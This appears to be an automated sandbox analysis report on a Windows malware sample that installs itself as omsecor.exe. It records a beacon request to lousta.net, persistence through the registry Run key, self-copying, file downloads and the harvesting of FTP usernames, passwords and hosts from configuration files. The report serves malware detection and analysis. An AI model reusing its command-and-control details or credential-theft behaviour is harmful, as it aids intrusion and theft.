                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.449749193.166.255.17180564C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:11:31.488007069 CEST161OUTGET /161/343.html HTTP/1.1
                From: 133702422009751771
                Via: opfcsi{>;56bttA;346_ojzA97f89j88f55=96ghd9h:;;g:71863i63
                Host: lousta.net
                Connection: Keep-Alive


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:00:09:36
                Start date:08/09/2024
                Path:C:\Users\user\Desktop\cnzWgjUhS2.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\cnzWgjUhS2.exe"
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:10B089F41384787F77A9DE73A9C55E4B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:00:09:36
                Start date:08/09/2024
                Path:C:\Users\user\AppData\Roaming\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:BA4DF80E161C9C58860725AAC02D99E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low
                Has exited:true

                Target ID:5
                Start time:00:10:00
                Start date:08/09/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\omsecor.exe
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:9AF480E9873460DD811C495A948A78AE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low
                Has exited:true

                Target ID:8
                Start time:00:11:30
                Start date:08/09/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\omsecor.exe /nomove
                Imagebase:0x400000
                File size:36'600 bytes
                MD5 hash:9AF480E9873460DD811C495A948A78AE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Reset < >
                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                  • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHeapWrite$AllocateChangeFindHandleNotificationProcessSize
                  • String ID:
                  • API String ID: 3476270553-0
                  • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 135f96d597183bf12dff870bffbdb7f9defbeb34ee59089557ae340a53569a7b
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 135f96d597183bf12dff870bffbdb7f9defbeb34ee59089557ae340a53569a7b
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779
                  APIs
                  • GetCommandLineW.KERNEL32 ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820), ref: 0040AB44
                  • CharLowerW.USER32(?), ref: 0040AB57
                  • CharLowerW.USER32(?), ref: 0040AB60
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: a1b258860002bc12c08fbd9961b7a6ab8b05c7ecdd508c99b624503958201486
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: a1b258860002bc12c08fbd9961b7a6ab8b05c7ecdd508c99b624503958201486
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                  • RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID: w,@
                  • API String ID: 3356406503-3776089593
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040781B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                  • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                  • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: PrivateProfileString$AllocateHeap
                  • String ID: connections$default$ftp://%s:%s@%s$host$password$username
                  • API String ID: 1411386233-3902919163
                  • Opcode ID: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                  • Opcode Fuzzy Hash: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                  APIs
                    • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?), ref: 00406A8C
                    • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                  • GetSystemMetrics.USER32(00000000), ref: 004032E5
                  • GetSystemMetrics.USER32(00000001), ref: 004032ED
                  • VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?), ref: 00403309
                  • VirtualProtect.KERNEL32(75C50B88,0000000A,?,?), ref: 00403333
                  • SetUnhandledExceptionFilter.KERNEL32(004032AF), ref: 0040333A
                  • LoadLibraryW.KERNEL32(atl), ref: 00403345
                  • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                  • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                  • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                  • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                  • API String ID: 3066332896-2664446222
                  • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                  • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403566
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                  • RtlAllocateHeap.NTDLL(00000008,00000C20), ref: 004035B5
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                  • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403681
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: PrivateProfile$String$AllocateHeap$CombinePath
                  • String ID: ftp://%s:%s@%s:%u$pass$port$user
                  • API String ID: 3333933401-2696999094
                  • Opcode ID: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                  • Opcode Fuzzy Hash: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • FindFirstFileW.KERNEL32(?,?), ref: 00408280
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                  • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                  • Sleep.KERNEL32(00000000), ref: 00408342
                  • Sleep.KERNEL32(00000000), ref: 00408377
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                  • FindClose.KERNEL32(00000000), ref: 004083B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                  • String ID: 5@$5@$.$.
                  • API String ID: 2348139788-1020649804
                  • Opcode ID: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                  • Opcode Fuzzy Hash: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                  APIs
                  • DeleteFileW.KERNEL32(?,74DF0F00), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32(00000000), ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID:
                  • String ID: &condition_id=$&kwtype=$&real_refer=%s$&ref=%s$&ref=%s&real_refer=%s$0$0$0$0
                  • API String ID: 0-2992689389
                  • Opcode ID: a727e907e4fa3dcf0a7e47aeb1b7c58c319b6e169d55fc458ead9a64ed98c1b2
                  • Instruction ID: e592e17ffd072e5ed7288f56bd6294cd549ee2c695a1c784d027d9705cc039a8
                  • Opcode Fuzzy Hash: a727e907e4fa3dcf0a7e47aeb1b7c58c319b6e169d55fc458ead9a64ed98c1b2
                  • Instruction Fuzzy Hash: B2F1E272810118AADB14EB61DC919EF737EEF01304F5044BBFA09B62D1E7789E858F99
                  APIs
                  • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
